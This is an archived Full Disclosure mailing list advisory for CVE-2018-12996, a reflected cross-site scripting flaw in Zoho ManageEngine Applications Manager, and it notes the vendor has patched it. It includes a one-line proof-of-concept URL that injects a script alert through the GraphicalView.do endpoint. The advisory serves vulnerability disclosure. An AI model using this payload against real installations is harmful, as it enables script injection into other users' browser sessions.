Full Disclosure mailing list archives
[CVE-2018-12996] Zoho manageengine Applications Manager Reflected XSS
From: "xiaotian.wang"<xiaotian.wang () dbappsecurity com cn>
Date: Fri, 20 Jul 2018 14:04:28 +0800
This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html ========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script Notice: It can be successfully reproduced under IE.
Attachment:
1111.png
Description:
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- [CVE-2018-12996] Zoho manageengine Applications Manager Reflected XSS xiaotian.wang (Jul 20)